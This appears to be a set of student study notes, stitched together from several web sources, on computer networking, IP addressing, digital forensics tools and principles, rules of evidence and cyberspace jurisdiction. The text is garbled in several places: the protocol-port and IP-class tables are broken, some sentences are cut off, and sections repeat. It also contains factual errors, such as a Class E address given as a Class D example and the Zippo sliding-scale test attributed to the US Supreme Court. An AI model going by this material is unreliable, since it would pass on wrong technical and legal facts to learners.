connecting the different rooms and offices. The wireless access points also create a mesh
topology for wireless devices. This hybrid topology allows for efficient communication
between different buildings while providing flexibility and redundancy within each
building.
For more, refer to the Advantages and Disadvantages of Hybrid Topology.
b)Devices
Discuss
Network Devices: Network devices, also known as networking hardware, are physical
devices that allow hardware on a computer network to communicate and interact with
one another. For example Repeater, Hub, Bridge, Switch, Routers, Gateway, Brouter, and
NIC, etc.
1. Repeater – A repeater operates at the physical layer. Its job is to regenerate the signal
over the same network before the signal becomes too weak or corrupted to extend the
length to which the signal can be transmitted over the same network. An important point
to be noted about repeaters is that they not only amplify the signal but also regenerate it.
When the signal becomes weak, they copy it bit by bit and regenerate it at its star
topology connectors connecting following the original strength. It is a 2-port device.
2. Hub – A hub is a basically multi-port repeater. A hub connects multiple wires coming
from different branches, for example, the connector in star topology which connects
different stations. Hubs cannot filter data, so data packets are sent to all connected
devices. In other words, the collision domain of all hosts connected through Hub remains
one. Also, they do not have the intelligence to find out the best path for data packets
which leads to inefficiencies and wastage.
Types of Hub
Active Hub:- These are the hubs that have their power supply and can clean, boost,
and relay the signal along with the network. It serves both as a repeater as well as a
wiring center. These are used to extend the maximum distance between nodes.
Passive Hub:- These are the hubs that collect wiring from nodes and power supply
from the active hub. These hubs relay signals onto the network without cleaning and
boosting them and can’t be used to extend the distance between nodes.
Intelligent Hub:- It works like an active hub and includes remote management
capabilities. They also provide flexible data rates to network devices. It also enables
an administrator to monitor the traffic passing through the hub and to configure each
port in the hub.
3. Bridge – A bridge operates at the data link layer. A bridge is a repeater, with add on
the functionality of filtering content by reading the MAC addresses of the source and
destination. It is also used for interconnecting two LANs working on the same protocol. It
has a single input and single output port, thus making it a 2 port device.
Types of Bridges
Transparent Bridges:- These are the bridge in which the stations are completely
unaware of the bridge’s existence i.e. whether or not a bridge is added or deleted from
the network, reconfiguration of the stations is unnecessary. These bridges make use of
two processes i.e. bridge forwarding and bridge learning.
Source Routing Bridges:- In these bridges, routing operation is performed by the
source station and the frame specifies which route to follow. The host can discover
the frame by sending a special frame called the discovery frame, which spreads
through the entire network using all possible paths to the destination.
4. Switch – A switch is a multiport bridge with a buffer and a design that can boost its
efficiency(a large number of ports imply less traffic) and performance. A switch is a data
link layer device. The switch can perform error checking before forwarding data, which
makes it very efficient as it does not forward packets that have errors and forward good
packets selectively to the correct port only. In other words, the switch divides the
collision domain of hosts, but the broadcast domain remains the same.
Types of Switch
1. Unmanaged switches: These switches have a simple plug-and-play design and do not
offer advanced configuration options. They are suitable for small networks or for use
as an expansion to a larger network.
2. Managed switches: These switches offer advanced configuration options such as
VLANs, QoS, and link aggregation. They are suitable for larger, more complex
networks and allow for centralized management.
3. Smart switches: These switches have features similar to managed switches but are
typically easier to set up and manage. They are suitable for small- to medium-sized
networks.
4. Layer 2 switches: These switches operate at the Data Link layer of the OSI model and
are responsible for forwarding data between devices on the same network segment.
5. Layer 3 switches: These switches operate at the Network layer of the OSI model and
can route data between different network segments. They are more advanced than
Layer 2 switches and are often used in larger, more complex networks.
6. PoE switches: These switches have Power over Ethernet capabilities, which allows
them to supply power to network devices over the same cable that carries data.
7. Gigabit switches: These switches support Gigabit Ethernet speeds, which are faster
than traditional Ethernet speeds.
8. Rack-mounted switches: These switches are designed to be mounted in a server rack
and are suitable for use in data centers or other large networks.
9. Desktop switches: These switches are designed for use on a desktop or in a small
office environment and are typically smaller in size than rack-mounted switches.
10. Modular switches: These switches have modular design, which allows for easy
expansion or customization. They are suitable for large networks and data centers.
5. Routers – A router is a device like a switch that routes data packets based on their IP
addresses. The router is mainly a Network Layer device. Routers normally connect LANs
and WANs and have a dynamically updating routing table based on which they make
decisions on routing the data packets. The router divides the broadcast domains of hosts
connected through it.
6. Gateway – A gateway, as the name suggests, is a passage to connect two networks that
may work upon different networking models. They work as messenger agents that take
data from one system, interpret it, and transfer it to another system. Gateways are also
called protocol converters and can operate at any network layer. Gateways are generally
more complex than switches or routers. A gateway is also called a protocol converter.
7. Brouter – It is also known as the bridging router is a device that combines features of
both bridge and router. It can work either at the data link layer or a network layer.
Working as a router, it is capable of routing packets across networks and working as the
bridge, it is capable of filtering local area network traffic.
8. NIC – NIC or network interface card is a network adapter that is used to connect the
computer to the network. It is installed in the computer to establish a LAN. It has a
unique id that is written on the chip, and it has a connector to connect the cable to it. The
cable acts as an interface between the computer and the router or modem. NIC card is a
layer 2 device which means that it works on both the physical and data link layers of the
network model.
c) protocols and port
40 Network Protocol Names And Port Numbers With Their Transport Protocols And Meanings
tabulated by Precious Ocansey (HND, Network Engineer).
Network protocols are the languages and rules used during communication in a computer
network. There are two major transport protocols namely;
UDP which stands for “User Datagram Protocol” is part of the TCP/IP suite of protocols used for
data transferring. UDP is a known as a “connectionless-oriented” protocol, meaning it doesn’t
acknowledge that the packets being sent have been received. For this reason, the UDP protocol is
typically used for streaming media. While you might see skips in video or hear some fuzz in
audio clips, UDP transmission prevents the playback from stopping completely.
Furthermore, TCP also includes built-in error checking means TCP has more overhead and is
therefore slower than UDP, it ensures accurate delivery of data between systems. Therefore TCP
is used for transferring most types of data such as webpages and files over the local network or
Internet. UDP is ideal for media streaming which does not require all packets to be delivered.
Port Numbers: They are the unique identifiers given to all protocol numbers so they can be
accessed easily.
Below is as written by Precious Ocansey. The 40 Network Protocols, their port numbers and
their transport protocols
8.Dynamic Host
It is a kind of service used in the client
Configuration Protocol 67 and 68 UDP
and server model.
(DHCP)
13.Simple Network
It has the ability to monitor, configure
Management Protocol 161 and 162 TCP and UDP
and control network devices.
(SNMP)
34.Remote Procedure Call TCP and UDP It is a protocol for requesting a service
Protocol (RPC) from a program location in a remote
computer through a network.
d) communIcation media
Different means are used for transmitting data from one source to another.
These two forms of communication media are-
1. Analog
Some of the common examples of analog media are conventional radios,
land-line telephones, VCRs, television transmissions, etc.
2. Digital
All in all, such communication mediums act as channels as they help in linking
various sources to pass the information, message, or data. Let us now go
through the types of communication media based upon the methods of
communication
1. Television
2. Radio
3. Print
The Internet is the largest and the most popular type of communication media.
Almost everything can be searched on the internet. The internet has access to
all the relevant information sought by the audience.
5. Outdoor Media
Such forms of mass media revolve around signs, placards, billboards, etc that
are used inside or outside of vehicles, shops, commercial buildings, stadiums,
etc.
Advantages:
⇢ Least expensive
⇢ Easy to install
⇢ High-speed capacity
Disadvantages:
⇢ Susceptible to external interference
⇢ Lower capacity and performance in comparison to STP
⇢ Short distance transmission due to attenuation
Applications:
Used in telephone connections and LAN networks
Shielded Twisted Pair (STP):
This type of cable consists of a special jacket (a copper braid covering or a
foil shield) to block external interference. It is used in fast-data-rate Ethernet
and in voice and data channels of telephone lines.
Advantages:
⇢ Better performance at a higher data rate in comparison to UTP
⇢ Eliminates crosstalk
⇢ Comparatively faster
Disadvantages:
⇢ Comparatively difficult to install and manufacture
⇢ More expensive
⇢ Bulky
Applications:
The shielded twisted pair type of cable is most frequently used in extremely cold
climates, where the additional layer of outer covering makes it perfect for
withstanding such temperatures or for shielding the interior components.
(ii) Coaxial Cable –
It has an outer plastic covering containing an insulation layer made of PVC or
Teflon and 2 parallel conductors each having a separate insulated protection
cover. The coaxial cable transmits information in two modes: Baseband
mode(dedicated cable bandwidth) and Broadband mode(cable bandwidth is
split into separate ranges). Cable TVs and analog television networks widely
use Coaxial cables.
Advantages:
High Bandwidth
Better noise Immunity
Easy to install and expand
Inexpensive
Disadvantages:
Single cable failure can disrupt the entire network
Applications:
Radio frequency signals are sent over coaxial wire. It can be used for cable
television signal distribution, digital audio (S/PDIF), computer network
connections (like Ethernet), and feedlines that connect radio transmitters and
receivers to their antennas.
(iii) Optical Fiber Cable –
It uses the concept of refraction of light through a core made up of glass or
plastic. The core is surrounded by a less dense glass or plastic covering called
the cladding. It is used for the transmission of large volumes of data.
The cable can be unidirectional or bidirectional. The WDM (Wavelength Division
Multiplexer) supports two modes, namely unidirectional and bidirectional mode.
Advantages:
Increased capacity and bandwidth
Lightweight
Less signal attenuation
Immunity to electromagnetic interference
Resistance to corrosive materials
Disadvantages:
Difficult to install and maintain
High cost
Fragile
Applications:
Medical Purpose: Used in several types of medical instruments.
Defence Purpose: Used in transmission of data in aerospace.
For Communication: This is largely used in formation of internet cables.
Industrial Purpose: Used for lighting purposes and safety measures in
designing the interior and exterior of automobiles.
(iv) Stripline
Stripline is a transverse electromagnetic (TEM) transmission line medium
invented by Robert M. Barrett of the Air Force Cambridge Research Centre in
the 1950s. Stripline is the earliest form of the planar transmission line. It uses a
conducting material to transmit high-frequency waves it is also called a
waveguide. This conducting material is sandwiched between two layers of the
ground plane which are usually shorted to provide EMI immunity.
(v) Microstripline
In this, the conducting material is separated from the ground plane by a layer of
dielectric.
2. Unguided Media:
It is also referred to as Wireless or Unbounded transmission media. No physical
medium is required for the transmission of electromagnetic signals.
Features:
The signal is broadcasted through air
Less Secure
Used for larger distances
There are 3 types of Signals transmitted through unguided media:
(i) Radio waves –
These are easy to generate and can penetrate through buildings. The sending
and receiving antennas need not be aligned. Frequency Range:3KHz – 1GHz.
AM and FM radios and cordless phones use Radio waves for transmission.
Further Categorized as (i) Terrestrial and (ii) Satellite.
(ii) Microwaves –
It is a line of sight transmission i.e. the sending and receiving antennas need to
be properly aligned with each other. The distance covered by the signal is
directly proportional to the height of the antenna. Frequency Range:1GHz –
300GHz. These are majorly used for mobile phone communication and
television distribution.
Microwave Transmission
(iii) Infrared –
Infrared waves are used for very short distance communication. They cannot
penetrate through obstacles. This prevents interference between systems.
Frequency Range:300GHz – 400THz. It is used in TV remotes, wireless mouse,
keyboard, printer, etc.
6. IP address
a) types
What is an IP Address?
An IP address is a numerical label assigned to the devices connected
to a computer network that uses the IP for communication. IP address
act as an identifier for a specific machine on a particular network. It
also helps you to develop a virtual connection between a destination
and a source.
Types of IP address
There are mainly four types of IP addresses:
Public,
Private,
Static
Dynamic.
Among them, public and private addresses are based on their location
of the network private, which should be used inside a network while
the public IP is used outside of a network.
Public IP Addresses
A public IP address is an address where one primary address is
associated with your whole network. In this type of IP address, each of
the connected devices has the same IP address.
It also likely includes all types of Bluetooth devices you use, like
printers or printers, smart devices like TV, etc. With a rising industry of
internet of things (IoT) products, the number of private IP addresses
you are likely to have in your own home is growing.
Dynamic IP address:
Dynamic IP addresses always keep changing. It is temporary and are
allocated to a device every time it connects to the web. Dynamic IPs
can trace their origin to a collection of IP addresses that are shared
across many computers.
Static IP Addresses
A static IP address is an IP address that cannot be changed. In
contrast, a dynamic IP address will be assigned by a Dynamic Host
Configuration Protocol (DHCP) server, which is subject to change.
Static IP address never changes, but it can be altered as part of
routine network administration.
Shared IP Addresses:
Shared IP address is used by small business websites that do not yet
get many visitors or have many files or pages on their site. The IP
address is not unique and it is shared with other websites.
Dedicated IP Addresses:
Dedicated IP address is assigned uniquely to each website. Dedicated
IP addresses helps you avoid any potential backlists because of bad
behavior from others on your server. The dedicated IP address also
gives you the option of pulling up your website using the IP address
alone, instead of your domain name. It also helps you to access your
website when you are waiting on a domain transfer.
Version of IP address
Two types of IP addresses are 1)IPV4 and 2) IPV6.
IPV4
IPv4 was the first version of IP. It was deployed for production in the
ARPANET in 1983. Today it is the most widely used IP version. It is
used to identify devices on a network using an addressing system.
IPV6
It is the most recent version of the Internet Protocol. Internet Engineer
Taskforce initiated it in early 1994. The design and development of
that suite is now called IPv6.
This new IP address version is being deployed to fulfill the need for
more Internet addresses. It was aimed to resolve issues which are
associated with IPv4. With 128-bit address space, it allows 340
undecillion unique address space.
b) classes
What is an IP Address?
An IP (Internet Protocol) address is a numerical label assigned to the
devices connected to a computer network that uses the IP for
communication.
Parts of IP
address
IP Address is divided into two parts:
Prefix: The prefix part of IP address identifies the physical
network to which the computer is attached. . Prefix is also known
as a network address.
Suffix: The suffix part identifies the individual computer on the
network. The suffix is also called the host address.
What is an IP Address?
IP Header Classes:
How does IP address work?
What is Classful Addressing?
Class A Network
Class B Network
Class C Network
Class D Network
Class E Network
Limitations of classful IP addressing
Rules for assigning Network ID:
Types of IP4 Classes
IP Header Classes:
Max number of
Class Address Range Subnet masking Example IP Leading bits Application
networks
Used for
of hosts.
Used for
network.
Max number of
Class Address Range Subnet masking Example IP Leading bits Application
networks
network.
Reserve
multi-tasking.
This class is
reserved
and Development
Purposes.
The address or your area is a group address of all houses that belong
to a specific area. The house address is the unique address of your
homes in that area. Here, your area is represented by a PIN code
number.
In this example, the network address comprises all hosts which belong
to a specific network. The host address is the unique address of a
particular host in that network.
What is Classful Addressing?
Classful addressing is a network addressing the Internet’s architecture
from 1981 till Classless Inter-Domain Routing was introduced in 1993.
Class A Network
This IP address class is used when there are a large number of hosts.
In a Class A type of network, the first 8 bits (also called the first octet)
identify the network, and the remaining have 24 bits for the host into
that network.
Class B Network
In a B class IP address, the binary addresses start with 10. In this IP
address, the class decimal number that can be between 128 to 191.
The number 127 is reserved for loopback, which is used for internal
testing on the local machine. The first 16 bits (known as two octets)
help you identify the network. The other remaining 16 bits indicate the
host within the network.
An example of Class B IP address is 168.212.226.204, where *168
212* identifies the network and *226.204* helps you identify the Hut
network host.
Class C Network
Class C is a type of IP address that is used for the small network. In
this class, three octets are used to indent the network. This IP ranges
between 192 to 223.
In this type of network addressing method, the first two bits are set to
be 1, and the third bit is set to 0, which makes the first 24 bits of the
address them and the remaining bit as the host address. Mostly local
area network used Class C IP address to connect with the network.
192.168.178.1
Class D Network
Class D addresses are only used for multicasting applications. Class
D is never used for regular networking operations. This class
addresses the first three bits set to “1” and their fourth bit set to use for
“0”. Class D addresses are 32-bit network addresses. All the values
within the range are used to identify multicast groups uniquely.
243.164.89.28
Summary:
An IP (Internet Protocol) address is a numerical label assigned to
the devices connected to a computer network that uses the IP for
communication.
IP Address is divided into two parts: 1) Prefix 2)Suffix
IP address works in a network like a postal address. For
example, a postal address combines two addresses, address, or
your area your house address.
In a class A type of network, the first 8 bits (also called the first
octet) identify the network, and the remaining have 24 bits for the
host into that network.
In class B type of network, the first 16 bits (known as two octets)
help you identify the network. The other remaining 16 bits
indicate the host within the network.
In class C, three octets are used to indent the network. This IP
ranges between 192 to 223.
Class D addresses are 32-bit network addresses. All the values
within the range are used to identify multicast groups uniquely.
Class E IP address is defined by including the starting four
network address bits as 1.
The major drawback of IP address classes is the risk of running
out of address space soon.
Important rule for assigning network id is that the network ID
cannot start with 127 as this number belongs to class A address
and reserved for internal loopback functions.
unit 3
1. Discuss
a)Basic principles of digital forensics
DEVISINH SODHA
26/04/2023
Digital forensics is a field that involves the recovery and investigation
of digital data for use in legal proceedings. The data may be
recovered from a computer system, a mobile device, or any other
digital storage media.
Table of Contents
The analysis of evidence may involve the use of specialized tools and
techniques, such as file carving, data recovery, and metadata
analysis. The forensic analyst must also be able to interpret the data
collected and provide a report on their findings.
Principle 4: Documentation of Evidence
The fourth principle of digital forensics is the documentation of
evidence. The documentation of evidence involves documenting the
steps taken during the investigation and the results obtained. The
forensic analyst must keep a detailed record of their findings and
provide a report on their analysis of the data collected.
Conclusion
Digital forensics is the method of analyzing a computer system after an attack has taken
place and looking for evidence . The digital forensic process consists of five steps :
1 2
Identification: finding evidence on electronic devices and saving the data to a safe drive . 32
Juniper researchers state that cybercrime will cost over 2 trillion USD to businesses by
2019. As costs go up, so the demand for digital forensic experts will increase in
tandem. Tools are a forensic examiner's best friend – using the right tool helps to move
things faster, improve productivity and gather all the evidence.
Whether it's for an internal human resources case, an investigation into unauthorized
access to a server, or if you just want to learn a new skill, these suites and utilities will
help you conduct memory forensic analysis, hard drive forensic analysis, forensic
image exploration, forensic imaging and mobile forensics. As such, they all provide the
ability to bring back in-depth information about what's 'under the hood' of a system.
1. SIFT Workstation
SIFT (SANS investigative forensic toolkit) Workstation is a freely-available virtual appliance
that is configured in Ubuntu 14.04. SIFT contains a suite of forensic tools needed to perform a
detailed digital forensic examination. It is one of the most popular open-source incident
response platforms.
2. Autopsy
Autopsy is a GUI-based open-source digital forensic programme to analyse hard drives and
smartphones efficiently. Autospy is used by thousands of users worldwide to investigate what
happened in a computer.
Autopsy was designed to be an end-to-end platform, with modules that come out-of-the-box
and others that are available from third parties. Some of the modules provide timeline analysis,
keyword searching, data carving, and Indicator of Compromise using STIX.
Download Autopsy
3. FTK Imager
FTK Imager is a data preview and imaging tool used to acquire data (evidence) in a
forensically sound manner by creating copies of data without making changes to the original
evidence. It saves an image of a hard disk, in one file or in segments, which may be
reconstructed later on. It calculates MD5 hash values and confirms the integrity of the data
before closing the files.
4. DEFT
DEFT is a household name when it comes to digital forensics and intelligence activities. The
Linux distribution DEFT is made up of a GNU/Linux and DART (Digital Advanced Response
Toolkit), a suite dedicated to digital forensics and intelligence activities. On boot, the system
does not use the swap partitions on the system being analysed. During system startup, there are
no automatic mount scripts.
Download DEFT
5. Volatility
Also built into SIFT, Volatility is an open-source memory forensics framework for incident
response and malware analysis. It is written in Python and supports Microsoft Windows, Mac
OS X, and Linux (as of version 2.5).
Forensic analysis of raw memory dump will be performed on a Windows platform. The
Volatility tool is used to determine whether the PC is infected or not. Subsequently, the
malicious programme can be extracted from the running processes from the memory dump.
Download Volatility
6. LastActivityView
LastActivityView is a tool for the Windows operating system that collects information from
various sources on a running system, and displays a log of actions made by the user and events
that occurred on this computer.
The activity displayed by LastActivityView includes: Running an .exe file, opening open/save
dialog-box, opening file/folder from Explorer or other software, software installation, system
shutdown/start, application or system crash and network connection and disconnection.
Download LastActivityView
7. HxD
HxD is a carefully designed and fast hex editor which, in addition to raw disk editing and
modifying of main memory (RAM), handles files of any size. The easy-to-use interface offers
features such as searching and replacing, exporting, checksums/digests, insertion of byte
patterns, a file shredder, concatenation or splitting of files, statistics and much more.
Download HxD
8. CAINE
CAINE offers a complete forensic environment that is organised to integrate existing software
tools as software modules and to provide a friendly graphical interface. This is a digital
forensics platform and graphical interface to the Sleuth Kit and other digital forensics tools.
Download CAINE
9. Redline
Redline is a free endpoint security tool that provides host investigative capabilities to users to
find signs of malicious activity through memory and file analysis and the development of a
threat assessment profile.
Redline can help audit and collect all running processes and drivers from memory, file-system
metadata, registry data, event logs, network information, services, tasks and web history; and
analyse and view imported audit data, including the ability to filter results around a given
timeframe.
Download Redline
10. PlainSight
PlainSight is a versatile computer forensics environment that allows you to perform forensic
operations such as: getting hard disk and partition information, extracting user and group
information, examining Windows firewall configuration, examining physical memory dumps,
extracting LanMan password hashes and previewing a system before acquiring it.
Download PlainSight
This is by no means an extensive list and may not cover everything you need for an
investigation, but it's a great starting point to becoming a forensic examiner. If you find any
other tool useful, please leave a comment below.
1. Make copies of the relevant data so you can work from them rather than
the original.
2. Consider using a write blocker. A write blocker is a hardware restriction
that allows forensics analysts to read data without changing it.
Once you have identified the evidence, the next crucial step is to
preserve the information on it.
3. Analysis
Now that you’ve preserved the evidence, you can begin analysing it. You’ll
use this information to determine how the cyber criminal breached the system
and what data they stole, modified or wiped.
An example of the methods a Digital Forensics Analyst may use to conduct
their analysis:
4. Documentation
As you document your findings, avoid assumptions and ensure your
conclusions are verifiable and accurate. If you make a mistake during
documentation, it could be used to prove that your evidence is untrustworthy!
Here are some precautions Digital Forensic Analyst’s take to ensure the
evidence holds up in a court case!
5. Presentation
Presenting your investigation’s findings is the final step of the process.
You should present findings without bias and in chronological order. Be
thorough, accurate and verify your conclusions throughout the investigation. If
you are presenting in court, your evidence is more likely to hold up and crack
the case!
Does the life of a Digital Forensics Analyst sound interesting? Why not try
your hand at some of the skills needed to analyse a piece of evidence. From
steganography to file hashes, play through real-world simulations in
the CyberStart Forensics base!
6. Data acquisition
Logical acquisition
Logical acquisition involves collecting files that are specifically related to the case under
investigation. This technique is typically used when an entire drive or network is too large to be
copied.
Sparse acquisition
standards
Principle 1
In order to ensure that digital evidence is collected, preserved, examined, or transferred in a manner
safeguarding the accuracy and reliability of the evidence, law enforcement and forensic
organizations must establish and maintain an effective quality system. Standard Operating
Procedures (SOPs) are documented quality-control guidelines that must be supported by proper
case records and use broadly accepted procedures, equipment, and materials.
Discussion. The use of SOPs is fundamental to both law enforcement and forensic science.
Guidelines that are consistent with scientific and legal principles are essential to the acceptance of
results and conclusions by courts and other agencies. The development and implementation of
these SOPs must be under an agency’s management authority.
Discussion. Rapid technological changes are the hallmark of digital evidence, with the types,
formats, and methods for seizing and examining digital evidence changing quickly. In order to
ensure that personnel, training, equipment, and procedures continue to be appropriate and effective,
management must review and update SOP documents annually.
Discussion. Because a variety of scientific procedures may validly be applied to a given problem,
standards and criteria for assessing procedures need to remain flexible. The validity of a procedure
may be established by demonstrating the accuracy and reliability of specific techniques. In the digital
evidence area, peer review of SOPs by other agencies may be useful.
Discussion. Procedures should set forth their purpose and appropriate application. Required
elements such as hardware and software must be listed and the proper steps for successful use
should be listed or discussed. Any limitations in the use of the procedure or the use or interpretation
of the results should be established. Personnel who use these procedures must be familiar with
them and have them available for reference.
Discussion. Although many acceptable procedures may be used to perform a task, considerable
variation among cases requires that personnel have the flexibility to exercise judgment in selecting a
method appropriate to the problem.
Hardware used in the seizure and/or examination of digital evidence should be in good operating
condition and be tested to ensure that it operates correctly. Software must be tested to ensure that it
produces reliable results for use in seizure and/or examination purposes.
All activity relating to the seizure, storage, examination, or transfer of digital evidence must be
recorded in writing and be available for review and testimony.
Discussion. In general, documentation to support conclusions must be such that, in the absence of
the originator, another competent person could evaluate what was done, interpret the data, and
arrive at the same conclusions as the originator.
The requirement for evidence reliability necessitates a chain of custody for all items of evidence.
Chain-of-custody documentation must be maintained for all digital evidence.
Case notes and records of observations must be of a permanent nature. Handwritten notes and
observations must be in ink, not pencil, although pencil (including color) may be appropriate for
diagrams or making tracings. Any corrections to notes must be made by an initialed, single strikeout;
nothing in the handwritten information should be obliterated or erased. Notes and records should be
authenticated by handwritten signatures, initials, digital signatures, or other marking systems.
Discussion. As outlined in the preceding standards and criteria, evidence has value only if it can be
shown to be accurate, reliable, and controlled. A quality forensic program consists of properly trained
personnel and appropriate equipment, software, and procedures to collectively ensure these
attributes.
Comments
SWGDE’s proposed standards for the exchange of digital evidence will be posted on the National
Forensic Science Technology Center, Law Enforcement Online, and IOCE Web sites in the near
future.
Comments and questions concerning the proposed standards may be forwarded to
whitcomb@mail.ucf.edu or mpollitt.cart@fbi.gov
There are five steps in a digital forensics investigation, the first two of which are the
most critical during data acquisition (EC-Council, 2021b):
Identification
Preservation
Analysis
Documentation
Presentation
The first stage involves ensuring that all files and evidence related to the ongoing
investigation have been properly identified. This involves conducting an appropriate
examination of the device or network in question as well as interviewing the individuals
involved in the network breach. These individuals may have guidance for your
investigation or other useful information and may be able to tell you how the breach in
question occurred.
The second stage is preservation of evidence: maintaining the data in the state in which
it is found for later examination and analysis. No one else should be able to access the
information in question. After completing these steps, you can move on to copying,
examining, and analyzing the evidence.
Properly identifying and preserving evidence ensures that it can be analyzed.
Accurately identified and preserved evidence can help digital forensic investigators
understand how the data damage occurred, what hacking methods were used, and how
individuals and organizations can prevent similar cyberattacks in the future. These
conclusions must be supported by the evidence, which is confirmed in the
documentation step. All evidence is then placed into a presentation that can be given to
others.
Proper management of data acquisition is critical in any investigation. However, it’s only
the first step in properly conducting digital forensics and protecting your clients’
information. At EC-Council, we offer internationally recognized trainings and
certifications, such as the Certified Hacking Forensic Investigator (C|HFI) program. By
completing this course and earning your C|HFI certification, you’ll learn about a variety
of aspects of the field of digital forensics, including digital data acquisition. Start your
certification journey with EC-Council today!
unit 4
1.Evidence collection
a) discuss rules of evidence
There are five rules of collecting electronic evidence. These relate to five properties that
evidence must have to be useful.
1. Admissible
2. Authentic
3. Complete
4. Reliable
5. Believable
Admissible
Admissible is the most basic rule (the evidence must be able to be used) in court or
otherwise. Failure to comply with this rule is equivalent to not collecting the evidence in the
first place, except the cost is higher.
Authentic
If you can’t tie the evidence positively with the incident, you can’t use it to prove anything.
You must be able to show that the evidence relates to the incident in a relevant way.
Complete
It’s not enough to collect evidence that just shows one perspective of the incident. Not only
should you collect evidence that can prove the attacker’s actions, but also evidence that
could prove their innocence. For instance, if you can show the attacker was logged in at the
time of the incident, you also need to show who else was logged in, and why you think they
didn’t do it. This is called exculpatory evidence, and is an important part of proving a case.
Reliable
The evidence you collect must be reliable. Your evidence collection and analysis
procedures must not cast doubt on the evidences authenticity and veracity.
Believable
The evidence you present should be clearly understandable and believable by a jury.
There’s no point presenting a binary dump of process memory if the jury has no idea what it
all means. Similarly, if you present them with a formatted, human-understandable version,
you must be able to show the relationship to the original binary, otherwise there’s no way for
the jury to know whether you’ve faked it.
Using the preceding five rules, you can derive some basic do’s and don’ts:
o Account for any changes and keep detailed logs of your actions
o Be prepared to testify
o Work fast
Once you’ve created a master copy of the original data, don’t touch it or the original itself—
always handle secondary copies. Any changes made to the originals will affect the outcomes of
any analysis later done to copies. You should make sure you don’t run any programs that modify
the access times of all files (such as tar and xcopy). You should also remove any external
avenues for change and, in general, analyze the evidence after it has been collected.
Account for Any Changes and Keep Detailed Logs of Your Actions
Sometimes evidence alteration is unavoidable. In these cases, it is absolutely essential that the
nature, extent, and reasons for the changes be documented. Any changes at all should be
accounted for—not only data alteration but also physical alteration of the originals (i.e., the
removal of hardware components).
If you don’t understand what you are doing, you can’t account for any changes you make and
you can’t describe what exactly you did. If you ever find yourself “out of your depth,” either go
and learn more before continuing (if time is available) or find someone who knows the territory.
Never soldier on regardless—you’re just damaging your case.
If you fail to comply with your company’s security policy, you may find yourself with some
difficulties. Not only may you end up in trouble (and possibly fired if you’ve done something
really against policy), but also you may not be able to use the evidence you’ve gathered. If in
doubt, talk to those who know.
Capturing an accurate image of the system is related to minimizing the handling or corruption of
original data—differences between the original system and the master copy count as a change to
the data. You must be able to account for the differences.
Be Prepared to Testify
If you’re not willing to testify to the evidence you have collected, you might as well stop before
you start. Without the collector of the evidence being there to validate the documents created
during the evidence-collection process, the evidence becomes hearsay, which is inadmissible.
Remember that you may need to testify at a later time.
No one is going to believe you if they can’t replicate your actions and reach the same results.
This also means that your plan of action shouldn’t be based on trial-and-error.
Work Fast
The faster you work, the less likely the data is going to change. Volatile evidence may vanish
entirely if you don’t collect it in time. This is not to say that you should rush—you must still be
collecting accurate data. If multiple systems are involved, work on them in parallel (a team of
investigators would be handy here), but each single system should still be worked on
methodically. Automation of certain tasks makes collection proceed even faster.
You should never, ever shutdown a system before you collect the evidence. Not only do you lose
any volatile evidence but also the attacker may have trojaned (trojan horse) the startup and
shutdown scripts, Plug-and-Play devices may alter the system configuration and temporary file
systems may be wiped out. Rebooting is even worse and should be avoided at all costs. As a
general rule, until the compromised disk is finished with and restored, it should never be used as
a boot disk.
Because the attacker may have left trojaned programs and libraries on the system, you may
inadvertently trigger something that could change or destroy the evidence you’re looking for.
Any programs you use should be on read-only media (such as a CD-ROM or a write-protected
floppy disk), and should be statically linked.
b) Jurisdiction
Jurisdiction In Cyberspace
A fast-paced world, and surprisingly fitting in one’s hand. The world is in the era of
“internet and cyberspace”, and it seems faster and better than ever. But it all comes
with a price, that mankind is still in the exploration of. Just as in the real and physical
world, the virtual space created by humans also sees a plethora of criminal activities
on a day to day basis where the data of millions of people acts as valuable assets. It
has the power to instigate a civil war or to destroy nations altogether, steal data for
ransom, or even rob millions from a bank in seconds. It becomes quite a challenge to
map out a conclusive set of applicable laws to contain this mass virtual force. The
major obstacle being how, when these offences are prosecuted, the personal
jurisdiction is to be applied.
This article breaks down how the legal principles have evolved while determining
personal jurisdiction in cyberspace.
While cyberspace and the internet share very similar connotations, cyberspace can be
defined as anything that is done using the internet, while the internet is a network or
networks.
In layman terms “cyberspace” is a virtual universe made up of the widely spread and
interconnected digital gadgets and technology, enabling one to create, modify, share,
exchange, extract and destroy the physical resources floating all over the internet.
The world we live in is possibly at its simplest, most sophisticated version, as at this
point in time, and we could only hope for it to make many innovative new changes.
The world seems so much smaller at our fingertips, lives have collectively become
easier. Education, E-commerce, shopping, banking, and almost every other essential
has taken its spot on the internet. In fact, some of the richest multinational companies
are that of Google and Facebook that are empires built virtually on nothing but data.
The huge number of users are the customers and their personal information, the asset.
Each of these businesses run on nothing but loads of information, some private, some
not, and it becomes necessary to build a hyper-vigilant screening process in providing
our personal information, because of the immense threats that tag-along with this
mighty tool.
With business transactions moving online, the conventional methods of dealing with
legal complications are also in need of remoulding to fit into the present, needful
circumstances.
It is often very ambiguous to decipher what place holds jurisdiction over disputes that
arise in the vast cyberspace. In her paper “Principles of Jurisdiction”, Betsy
Rosenblatt states that “a court must first decide “where” the internet conduct takes
place, and what it means for internet activity to have an “effect” within a state or a
nation”. [1]
Cyberattacks can range from personal data breaches to mass frauds, each of which is
equally dangerous and harmful, putting one’s usage of cyberspace at risk.
Cyberattacks are where internet users use malicious maneuvres to steal, destroy,
expose, or gain unauthorized access into the personal information of a person,
company, military databases, etc.,
Due to its versatile and inconsistent nature, absence of physical boundaries and
dynamic space structures, containing cyberspace in the bounds of a few specific laws
and assigning jurisdiction becomes quite a task.
Hence, a resident shall inevitably be tried under municipal laws, but there persists
ambiguity while dealing with non-residents.
The US Supreme Court later laid down the “Zipper test” or the “Sliding Scale test”
that- “In the absence of general jurisdiction, specific jurisdiction permits a court to
exercise personal jurisdiction over a non-resident defendant for forum-related
activities where the relationship between the defendant and the forum falls within the
‘minimum contacts’ framework” and classified websites as (i) passive, (ii) interactive
and (iii) integral to the defendant’s business.
The difficulty experienced with the application of the Zippo sliding scale test paved
the way for the application of “the effects test”. The courts have thus moved from a
‘subjective territoriality’ test to an ‘objective territoriality’ or ‘the effects test’ in
which the forum court will exercise jurisdiction if it is shown that effects of the
defendant’s website are felt in the forum state. In other words, it must have resulted in
some harm or injury to the plaintiff within the territory of the forum state- as
pronounced primarily in Calder v. Jones.
The recent lawsuit by the International League Against Racism and Anti-Semitism
and the Union of French Law Students against Yahoo!, (Yahoo! Inc., v La Ligue
